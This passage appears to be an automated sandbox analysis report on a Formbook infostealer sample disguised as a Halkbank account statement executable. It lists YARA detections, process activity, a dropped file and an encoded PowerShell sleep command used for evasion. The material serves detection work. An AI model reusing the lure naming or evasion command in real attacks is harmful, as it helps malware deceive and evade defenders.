Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 4744, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\verify.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_00E61539	0_2_00E61539
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB0F18	0_2_05DB0F18
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB0162	0_2_05DB0162
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB0040	0_2_05DB0040
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB045B	0_2_05DB045B
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB0FDA	0_2_05DB0FDA
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB6720	0_2_05DB6720
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB0950	0_2_05DB0950
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB085B	0_2_05DB085B
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05DB13D0	0_2_05DB13D0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E97480	0_2_05E97480
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E9B438	0_2_05E9B438
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E9F628	0_2_05E9F628
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E9E880	0_2_05E9E880
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E9E03C	0_2_05E9E03C
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E9C4B8	0_2_05E9C4B8
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_05E9B768	0_2_05E9B768
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 0_2_00E65DE6	0_2_00E65DE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005B5D68	1_2_005B5D68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005B1698	1_2_005B1698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005B1690	1_2_005B1690
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005BD78B	1_2_005BD78B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005EC2E8	1_2_005EC2E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005E94BB	1_2_005E94BB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005E9AF8	1_2_005E9AF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005EAF10	1_2_005EAF10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_005EA772	1_2_005EA772
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_076C3330	1_2_076C3330
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041D052	17_2_0041D052
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0040102A	17_2_0040102A
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00401030	17_2_00401030
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041B8D3	17_2_0041B8D3
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041C174	17_2_0041C174
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041C9FB	17_2_0041C9FB
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041C22A	17_2_0041C22A
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041CC5B	17_2_0041CC5B
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00408C80	17_2_00408C80
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00402D87	17_2_00402D87
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00402D90	17_2_00402D90
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041C59C	17_2_0041C59C
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041C6C5	17_2_0041C6C5
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041BEC7	17_2_0041BEC7
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00402FB0	17_2_00402FB0

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_004185E0 NtCreateFile,	17_2_004185E0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00418690 NtReadFile,	17_2_00418690
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_00418710 NtClose,	17_2_00418710
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_004187C0 NtAllocateVirtualMemory,	17_2_004187C0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041883A NtAllocateVirtualMemory,	17_2_0041883A
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_004185DA NtCreateFile,	17_2_004185DA
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041868A NtCreateFile,	17_2_0041868A
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041868F NtReadFile,	17_2_0041868F
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 17_2_0041870B NtClose,	17_2_0041870B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe	Binary or memory string: OriginalFilename vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJihogazdofjyz.dll" vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.930169193.0000000000752000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCszji.exe. vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935239896.0000000005D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameJihogazdofjyz.dll" vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe	Binary or memory string: OriginalFilename vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000000.925942429.0000000000B52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCszji.exe. vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000003.930343050.0000000001396000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936183255.000000000185F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936013595.00000000016CF000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe	Binary or memory string: OriginalFilenameCszji.exe. vs Halkbank_Ekstre_20220128_081138_756957 (1).exe

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: verify.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

File read: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Jump to behavior

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe "C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

File created: C:\Users\user\AppData\Local\verify.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_425bqlqm.lt5.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/7@1/1

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.935902947.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000003.930075303.0000000001280000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936013595.00000000016CF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.935902947.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000003.930075303.0000000001280000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936013595.00000000016CF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp
